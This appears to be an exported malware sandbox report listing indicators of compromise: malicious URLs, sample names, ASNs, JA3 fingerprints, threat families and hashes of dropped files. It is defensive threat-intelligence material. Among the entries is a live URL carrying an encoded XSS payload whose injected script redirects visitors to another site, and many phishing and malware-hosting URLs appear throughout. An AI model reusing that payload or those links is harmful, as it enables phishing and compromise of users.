	https://l.workplace.com/l.php?u=https%3A%2F%2Flookaside.fbsbx.com%2Ffile%2FInghams%2520-%2520Hi-Res%2520Masterbrand%2520Colour%2520Logo%2520-%2520Always%2520Good_RGB%2520%255Bfor%2520digital%252C%2520online%2520and%2520Microsoft%2520Templates%255D.png%3Ftoken%3DAWxzKoi1nUB59NvsJAG35rI9D0aOOyzrR_PTZAd9DoL6_qLIGf9zIjSF0JWeFwBB4O_Ex9BSSDzHo5Kc-z69kH5xLPrunP67a7Gg_gNW-IZBGfLtVAScC0_Soqass62EpFvp19XiZwu-t3SbdvFKIbgZiHYv8JwAt48eNPNNPAfegwBz5YiuOC_yzKaW8R-rRdChxANoqihf6uC5DIJ3fOo1WyrrQ9tWZzDlRSq6xEpAVmuFS8uJefBWRMb_IltKrzlL6mHESszRDv_-2U-tDs8BDe_sK3jcP69DmeOJ1slv_IcHHB7ZXVNpLIifBYllRdPB7vx7cskYHEr9dZA8Ett_mGslvGTxP7Va6mWs4_HfXSuJX1b3DyFUALoyx1iEPxeOtKd0bUO-VDSVuzsgmq-NgApAe1yeRTHf8dXIZ48Xfpi9YMnbssgSRMJM0fMVnMsvAaC0_VbZL9mBQ6AnwkTc%26__cid%3D612274792515426&h=AT1b5nA7SfQIC_f-JrcPE6qoQ868KN5q_fiMGwjmtCyuPJbOumUW-zhlOCc5WwzejzjZqbOmEK8tJb3Dtz3bFr2Jw8oCVw9vPPsbMAoOY6zVWgUUxKz5hA9ptrJbAfrtF3xuhlsFrbrhBAOhbr5I2pV8znFdu8WiMjbVAQ	Get hash	malicious	Unknown	Browse	157.240.0.13
	https://www.canva.com/design/DAGH7auLJhk/J8O7k7PopfnMFSHoCZmi3A/view	Get hash	malicious	HTMLPhisher	Browse	99.83.205.94
	https://www.canva.com/design/DAGHzVFnwZE/G_g8Yp1JfGIicllbdLc4cA/view?utm_content=DAGHzVFnwZE&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	99.83.205.94
	https://www.canva.com/design/DAGHRxjkBQs/XpHpQyzMKwZ_zBqzDOrfYw/view?utm_content=DAGHRxjkBQs&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	99.83.205.94
	https://www.encurtador.dev/redirecionamento/y1YTb	Get hash	malicious	Unknown	Browse	75.2.57.54
s3-w.us-east-1.amazonaws.com	https://ubrakes.com	Get hash	malicious	Unknown	Browse	3.5.25.197
	http://memekombat-in.web.app/app/	Get hash	malicious	Unknown	Browse	54.231.194.17
	http://theabhiichakraborty.github.io/netflix-clone	Get hash	malicious	Unknown	Browse	52.216.249.252
	https://ik.imagekit.io/123Svbhh/ftrset6setswet4.html?updatedAt=1718462448646?4310819171#xrqnAlmDAyjMFrlWVWYsbFdwravqbb&4rqOGDeDtaA&125266/254/ukxqsfpxur.home.php?sq=1570-452650&lk=256010-14&page=737	Get hash	malicious	Phisher	Browse	52.217.192.41
	https://github.com/Sxady/script/blob/main/corner.sh	Get hash	malicious	Xmrig	Browse	3.5.29.201
	http://mainalertss.com/landing/472c86f9-2929-4c42-ad7d-5a89e5f4928a	Get hash	malicious	Unknown	Browse	52.217.162.9
	https://dokumen.pub/qdownload/invitation-to-law-amp-society-an-introduction-to-the-study-of-real-law-2nbsped-022629661x-9780226296616.html	Get hash	malicious	Unknown	Browse	3.5.25.36
	https://shoutout.wix.com/so/01P0N6PDE/c?w=cr-og6okacPI2tZZ6li3IxScxT435SodxUO_J5_KCWY.eyJ1IjoiaHR0cHM6Ly96cHIuaW8vOXVhclpKYkdTQkh1IiwiciI6ImM1ZjViMmI4LTM5N2ItNGM5OC1iOGFhLTMyMWZiOTMwYWIwYiIsIm0iOiJtYWlsIiwiYyI6IjAwMDAwMDAwLTAwMDAtMDAwMC0wMDAwLTAwMDAwMDAwMDAwMCJ9	Get hash	malicious	Phisher	Browse	3.5.24.210
	https://giclee.haddadsfinearts.com/search.php?lastname=0y8he%22%3E%3Cimg%20src%3D%22image.jpg%22%20onerror%3D%22var%20url1%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%20var%20url2%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%0D%0Avar%20url%20%3D%20%5B%27ht%27%2C%27tps%27%2C%27%3A%2F%27%2C%27%2Fim%27%2C%27put%27%2C%27ele%27%2C%27tt%27%2C%27er%27%2C%27.c%27%2C%27om%2F%27%2C%270%2F0%27%2C%27%2F0%2F2a%27%2C%27b3%27%2C%27a%27%2C%27b892dfb%27%2C%277818%27%2C%27c1e5%27%2C%27dc5fcb%27%2C%27a9%27%2C%2736b%27%2C%276%2F9%2F39-12246%2F1267-654178-18507%27%5D.join%28%27%27%29%3B%0D%0A%20url%20%3D%20url.replace%28%2F%2C%2Fg%2C%20%27%27%29%3B%20var%20win%20%3D%20window.open%28url%2C%20%27_self%27%29%3B%20win.opener%20%3D%20null%3B%20win.location.replace%28url%29%3B%22%3E	Get hash	malicious	Phisher	Browse	54.231.160.137
	https://zpr.io/SvHzVsbrkF7Y	Get hash	malicious	Phisher	Browse	52.217.123.65
moreapp4you.online	yWny5Jds8b.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	31.31.196.208
bitbucket.org	YlluVjKozT.exe	Get hash	malicious	LummaC	Browse	104.192.141.1
	AaSwePhLEn.exe	Get hash	malicious	RHADAMANTHYS	Browse	104.192.141.1
	SecuriteInfo.com.Win32.DropperX-gen.2332.10313.exe	Get hash	malicious	LummaC	Browse	104.192.141.1
	nF54KOU30R.exe	Get hash	malicious	RHADAMANTHYS	Browse	104.192.141.1
	dfzesJIgdr.exe	Get hash	malicious	RedLine, Vidar	Browse	104.192.141.1
	InvoiceandLast 4 Digit CC.lnk	Get hash	malicious	XWorm	Browse	104.192.141.1
	Equipment Specs.lnk	Get hash	malicious	XWorm	Browse	104.192.141.1
	DHL Mondaydelivery requirement.vbs	Get hash	malicious	Unknown	Browse	104.192.141.1
	6tJtH22I7a.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc	Browse	104.192.141.1
	pending delivery needs attention.vbs	Get hash	malicious	Unknown	Browse	104.192.141.1
starjod.xyz	GarEwUZuLO.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	85.31.226.96
	o7dKnIGaW3.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	85.31.226.96
	bbSC5jm8tF.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, Vidar, zgRAT	Browse	85.31.226.96
	74APa4Tj5X.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	85.31.226.96

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NADYMSS-ASRU	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.172.128.116
	file.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	185.172.128.116
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.172.128.33
	j3KmxDxlLT.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	185.172.128.116
	Vnn3qRKOxH.exe	Get hash	malicious	Atlantida Stealer, PureLog Stealer	Browse	185.172.128.95
	http://sahelpvr.com/95ffd86438b05	Get hash	malicious	HTMLPhisher	Browse	185.172.128.161
	setup.exe	Get hash	malicious	Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	185.172.128.33
	dwS7xbnPuD.exe	Get hash	malicious	GCleaner	Browse	185.172.128.69
	Fa4v6yKWIr.exe	Get hash	malicious	Atlantida Stealer	Browse	185.172.128.95
	KvxCmtERTt.exe	Get hash	malicious	GCleaner	Browse	185.172.128.69
NAYATEL-PKNayatelPvtLtdPK	Pvq4zSr7yY.elf	Get hash	malicious	Unknown	Browse	124.109.51.225
	15k4cpuGzQ.elf	Get hash	malicious	Unknown	Browse	58.65.191.28
	https://ultimacommunications.com/cmc/roundcube/?email=rulescommittee_secretary@ao.uscourts.gov	Get hash	malicious	Unknown	Browse	203.82.48.218
	8blcHp1t06.exe	Get hash	malicious	AgentTesla	Browse	203.82.48.116
	vkGOmuEY6o.elf	Get hash	malicious	Mirai, Moobot	Browse	115.186.147.75
	P020241901.exe	Get hash	malicious	AgentTesla	Browse	203.82.48.116
	1xGvWmAmvc.elf	Get hash	malicious	Unknown	Browse	115.186.147.79
	28SY8i9x72.elf	Get hash	malicious	Mirai	Browse	115.186.147.68
	SPO-2344564.exe	Get hash	malicious	AgentTesla	Browse	203.82.48.116
	ox0CSfGwkZ.elf	Get hash	malicious	Mirai	Browse	58.65.166.34
WHOLESALECONNECTIONSNL	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.215.113.67
	yWny5Jds8b.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	185.215.113.67
	file.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	185.215.113.67
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.215.113.67
	setup.exe	Get hash	malicious	Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	185.215.113.67
	http://185.215.113.31:84/api/	Get hash	malicious	Unknown	Browse	185.215.113.31
	4TzzRzv0Hs.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.215.113.67
	KmhrN2q5ZO.exe	Get hash	malicious	Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, zgRAT	Browse	185.215.113.67
	zM3MeU5Z5L.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
	DPqKF5vqpe.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBC	Browse	185.215.113.67
LEVEL3US	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	4.185.27.237
	m7vfCd28fW.elf	Get hash	malicious	Mirai, Moobot	Browse	9.132.211.89
	pli6MTVsRr.elf	Get hash	malicious	Mirai	Browse	9.250.119.207
	qEGv2vQa9X.elf	Get hash	malicious	Mirai	Browse	9.36.142.242
	yyMSR8KZ7p.elf	Get hash	malicious	Mirai	Browse	4.190.66.146
	zQ35ev2Uw0.elf	Get hash	malicious	Mirai	Browse	9.112.146.56
	3jeKnZMljk.elf	Get hash	malicious	Mirai	Browse	9.200.100.57
	QsyCac05Yl.elf	Get hash	malicious	Mirai, Moobot	Browse	4.80.244.50
	iDUGkVNndq.elf	Get hash	malicious	Mirai	Browse	8.70.163.67
	H825YHtg9Y.elf	Get hash	malicious	Mirai	Browse	4.230.248.175

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	https://tinyurl.com/dakbuape	Get hash	malicious	Unknown	Browse	23.1.237.91
	WTLDR.exe	Get hash	malicious	Njrat	Browse	23.1.237.91
	2vHUPdHcdC.exe	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://irymarib.org/UP	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://asyncfunctionapi.com/X3NjL4YKuTP4PftiGfN7xFfYJTLQKBzRw2p3K2hpiTD	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://didianeensing-fft-oshehun.pages.dev/help/contact/897378126380120	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://hislopveronica697813.pages.dev/help/contact/20531876296725	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://eugeniewun72-englichs302.pages.dev/help/contact/606904659205408	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://keen-sundae-9ffdc2.netlify.app/feedback.html	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://hts45.vip/	Get hash	malicious	Telegram Phisher	Browse	23.1.237.91
28a2c9bd18a11de089ef85a160da29e4	https://pub-5b0a118dda134295a570e5927e002a03.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	40.127.169.103
	https://verify-infraction-messages.netlify.app/appeal_case_id_561597519/	Get hash	malicious	Unknown	Browse	40.127.169.103
	https://juno-3eddde.webflow.io/	Get hash	malicious	Unknown	Browse	40.127.169.103
	https://customer-sp-bayerjohnathan.pages.dev/help/contact/736508244296445172.66.44.109	Get hash	malicious	Unknown	Browse	40.127.169.103
	https://pub-a2fd5b00eeab4056a7b29674118a290f.r2.dev/bea142.html	Get hash	malicious	Unknown	Browse	40.127.169.103
	https://tinyurl.com/dakbuape	Get hash	malicious	Unknown	Browse	40.127.169.103
	https://eric-7643-brown.pages.dev/help/contact/706365041270587	Get hash	malicious	Unknown	Browse	40.127.169.103
	https://christian-brown389367257.pages.dev/help/contact/141201078782251	Get hash	malicious	Unknown	Browse	40.127.169.103
	WTLDR.exe	Get hash	malicious	Njrat	Browse	40.127.169.103
	https://test-access-system.com/analysis/	Get hash	malicious	Unknown	Browse	40.127.169.103
3b5074b1b5d032e5620f69f9f700ff0e	https://juno-3eddde.webflow.io/	Get hash	malicious	Unknown	Browse	31.31.196.208 104.192.141.1 3.5.27.203 140.82.121.3 67.199.248.11 54.67.42.145 185.199.111.133
	SecuriteInfo.com.Win64.Malware-gen.2589.25946.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	31.31.196.208 104.192.141.1 3.5.27.203 140.82.121.3 67.199.248.11 54.67.42.145 185.199.111.133
	T4LJO0xbse.exe	Get hash	malicious	Quasar	Browse	31.31.196.208 104.192.141.1 3.5.27.203 140.82.121.3 67.199.248.11 54.67.42.145 185.199.111.133
	https://42442763756652.docs.google.com/drawings/d/1tU7bhYvC_6uPDICVJZ5kXXR1DmS2YvHcWEekSlAaWLc/preview?VJ4GG	Get hash	malicious	Porn Scam	Browse	31.31.196.208 104.192.141.1 3.5.27.203 140.82.121.3 67.199.248.11 54.67.42.145 185.199.111.133
	4.pdf	Get hash	malicious	Unknown	Browse	31.31.196.208 104.192.141.1 3.5.27.203 140.82.121.3 67.199.248.11 54.67.42.145 185.199.111.133
	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	31.31.196.208 104.192.141.1 3.5.27.203 140.82.121.3 67.199.248.11 54.67.42.145 185.199.111.133
	yWny5Jds8b.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	31.31.196.208 104.192.141.1 3.5.27.203 140.82.121.3 67.199.248.11 54.67.42.145 185.199.111.133
	h2UFp4aCRq.exe	Get hash	malicious	LoaderBot, Xmrig	Browse	31.31.196.208 104.192.141.1 3.5.27.203 140.82.121.3 67.199.248.11 54.67.42.145 185.199.111.133
	Stand.Launchpad.exe	Get hash	malicious	Unknown	Browse	31.31.196.208 104.192.141.1 3.5.27.203 140.82.121.3 67.199.248.11 54.67.42.145 185.199.111.133
	Stand.Launchpad.exe	Get hash	malicious	Unknown	Browse	31.31.196.208 104.192.141.1 3.5.27.203 140.82.121.3 67.199.248.11 54.67.42.145 185.199.111.133
a0e9f5d64349fb13191bc781f81f42e1	vpn.msi	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	188.114.97.3 172.67.144.241
	setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 172.67.144.241
	90ZF1EDs9h.exe	Get hash	malicious	RisePro Stealer	Browse	188.114.97.3 172.67.144.241
	FieroHack.exe	Get hash	malicious	LummaC, Xmrig	Browse	188.114.97.3 172.67.144.241
	setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 172.67.144.241
	Extreme injector.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 172.67.144.241
	SecuriteInfo.com.Win64.DropperX-gen.26552.421.exe	Get hash	malicious	Unknown	Browse	188.114.97.3 172.67.144.241
	SecuriteInfo.com.Win64.DropperX-gen.26552.421.exe	Get hash	malicious	Unknown	Browse	188.114.97.3 172.67.144.241
	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	188.114.97.3 172.67.144.241
	yWny5Jds8b.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	188.114.97.3 172.67.144.241

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\wikombernizc\reakuqnanrkn.exe	0DHrPD3miS.exe	Get hash	malicious	Amadey	Browse
	SecuriteInfo.com.Win32.Evo-gen.26431.15713.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc	Browse
	bUWKfj04aU.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine	Browse
	g8DU6moaZ0.exe	Get hash	malicious	Amadey, Mars Stealer, RisePro Stealer, SmokeLoader, Stealc, Vidar	Browse
	latestroc.exe	Get hash	malicious	Fabookie, Glupteba, RedLine, SmokeLoader, XWorm	Browse
	bomb.bin.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, Fabookie, LummaC Stealer, PureLog Stealer, RedLine	Browse
	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Xmrig	Browse
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Xmrig	Browse
	n2vzgCmJ7K.exe	Get hash	malicious	Amadey, Fabookie, Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\FirstZ[1].exe	0DHrPD3miS.exe	Get hash	malicious	Amadey	Browse
	SecuriteInfo.com.Win32.Evo-gen.26431.15713.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc	Browse
	bUWKfj04aU.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine	Browse
	g8DU6moaZ0.exe	Get hash	malicious	Amadey, Mars Stealer, RisePro Stealer, SmokeLoader, Stealc, Vidar	Browse
	latestroc.exe	Get hash	malicious	Fabookie, Glupteba, RedLine, SmokeLoader, XWorm	Browse
	bomb.bin.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, Fabookie, LummaC Stealer, PureLog Stealer, RedLine	Browse
	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Xmrig	Browse
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Xmrig	Browse
	n2vzgCmJ7K.exe	Get hash	malicious	Amadey, Fabookie, Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\lummac2[1].exe	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse
	file.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse
	setup.exe	Get hash	malicious	Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, XWorm, zgRAT	Browse
	4TzzRzv0Hs.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse
	KmhrN2q5ZO.exe	Get hash	malicious	Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, zgRAT	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.3588072191296206
Encrypted:	false
SSDEEP:	6:6xkoaaD0JOCEfMuaaD0JOCEfMKQmDhxkoaaD0JOCEfMuaaD0JOCEfMKQmD:maaD0JcaaD0JwQQ3aaD0JcaaD0JwQQ
MD5:	663C5D6018506231E334FB3EA962ED1C
SHA1:	539A4641CE92E57E4ADEE32750A817326E596D4C
SHA-256:	066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
SHA-512:	5F910653FD1B12B94D314EDEDF6EB2BEC70D369D921EB5B7CF4D199B0374D6C798336E39DBF2781F3B0457280E0DDA63BDF4861DF31C08152544B0F1039D5FCD
Malicious:	false
Preview:	*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8337409956355307
Encrypted:	false
SSDEEP:	1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugm:gJjJGtpTq2yv1AuNZRY3diu8iBVqFip
MD5:	E808054688895C41DE4C8C7DEF49272A
SHA1:	6C3B2AEE205F3D418927F8AE600B870322B98EDB
SHA-256:	24BCF7447BB6A4F5FF45549A9F3BDB7CED541ED1CB03874A4B1DC8F5B1A42220
SHA-512:	221FF84E2FAB254C19942A2C5A16D576556CDDF3DFC30FEC16A0D22CD671320438596D6EC5961F248EB64474F7FC2E7E77E08B3C43ED0B36AC3102D79772665A
Malicious:	false
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x17d3c563, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6585118178548975
Encrypted:	false
SSDEEP:	1536:JSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:Jaza6xhzA2U8HDnAPZ4PZf9h/9h
MD5:	AF0189560B56754C110214F3232A64DD
SHA1:	34D983AC6177C243D9EAB64F005787D9CCB3A7AD
SHA-256:	F501B7C146E94F02B109211A305E8DEC1852F24F03C3D9229152897A9E8985CB
SHA-512:	2D7C13387D0B61D7067C33BB0AE0260DB85433AAD84CE1AAA90B3C79BB57A46AA74F9B73E8417FC551FE17BB809EB2F47A9D0AEBC471645472394EEB0FFE4D24
Malicious:	false
Preview:	...c... ...............X\...;...{......................T.~.....:....\|.......\|..h.\|.....:....\|..T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{....................................rc:....\|..................U...:....\|...........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07982065587206785
Encrypted:	false
SSDEEP:	3:8etYeHrsYIkXlGlktv8a/9dmevyTejaXlYll58Kgvvl/QoeP/ll:VzHrsYplGsv869EFTejSlIz8KgR+t
MD5:	C95069A51059C0F6F96CEA7DB8E706FB
SHA1:	F6988B747222C546B8941380656D8F2CCF964467
SHA-256:	AC2596F9C145EBFD7CFFD4D39FE1C4EA95E7C4D8AC30B2A1A141F08156C3556C
SHA-512:	DF93B77AC6FF551D3F662C44370AEEEB51CE354A204A59BD063A88D14E74D4752502EE3B134D39A1BB3728F43627DD78E6D1C2B8075247CA85155A6E6E9DA357
Malicious:	false
Preview:	w.*......................................;...{.......\|..:....\|..........:....\|..:....\|......:....\|..................U...:....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_legs.exe_5c9c85e758771469a94caa562157829af27ad53_8ee19854_143edb65-dfce-47d4-9d8c-ebe6db5a940f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6532430505915752
Encrypted:	false
SSDEEP:	96:1kFkA43YsQhqSoAyDqdQXIDcQnc68cElcw3IRP+HbHg/5hZAX/d5FMT2SlPkpXmm:qyAAYcJ0Z4/yUjhzuiFQZ24IO8+
MD5:	3B065F2C528FE297E9AE06563D3C0FCB
SHA1:	06F0228338250D2D87C725937692869D48D61544
SHA-256:	D4D8E22B5006AA078DB6707E0FDD9F2EBA81449B880374DF43C776FE8D83774A
SHA-512:	302B8A5ECFD5919A23F20B1ED8631C972989E7ABAA711A66AE392353F3F3376532937A5123B83529CFB3BB31EF05AFCF763B09B0BEB00D1121E76B47BF14F763
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.3.6.5.4.2.2.0.6.5.2.9.7.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.3.6.5.4.2.2.1.8.4.0.4.3.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.3.e.d.b.6.5.-.d.f.c.e.-.4.7.d.4.-.9.d.8.c.-.e.b.e.6.d.b.5.a.9.4.0.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.e.9.c.b.d.b.-.1.1.7.9.-.4.0.b.0.-.b.4.e.b.-.a.7.c.e.2.8.9.5.0.d.6.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.e.g.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.4.0.-.0.0.0.1.-.0.0.1.4.-.c.7.4.8.-.0.b.2.2.b.a.c.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.a.a.a.a.9.2.a.f.6.f.7.2.a.a.8.2.9.5.f.d.4.8.2.7.8.0.6.c.f.c.6.0.0.0.0.f.f.f.f.!.0.0.0.0.c.3.8.3.5.2.c.1.c.0.8.f.b.0.f.a.5.e.6.7.a.0.7.9.9.9.8.e.f.3.0.e.b.c.9.6.2.0.8.9.!.l.e.g.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.6.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5E8.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Jun 23 22:10:20 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	49128
Entropy (8bit):	1.6457929360723735
Encrypted:	false
SSDEEP:	192:vzZmuOX5PiceXrXJp7AoKyfHkcRJyTlOC:1mpXNinrwZIkcRJyB
MD5:	3CC4B72CD79C32FA96F3F32208D1BBB8
SHA1:	F4E8ADE74EBF894DDC50CD39457C889BD6BA6CFB
SHA-256:	7B70FF43331020506443A33D23C27F7187EBBF0744D953DAAEC60142A815EE27
SHA-512:	D176B5CFF41BD8C36E64F330BD8C0CBF5DEB53B558C325A18DD33845978C23D3B6DB573270C103D32E842A94DADCD89BDB1C4B03796DD20A4F7982C4779F1D45
Malicious:	false
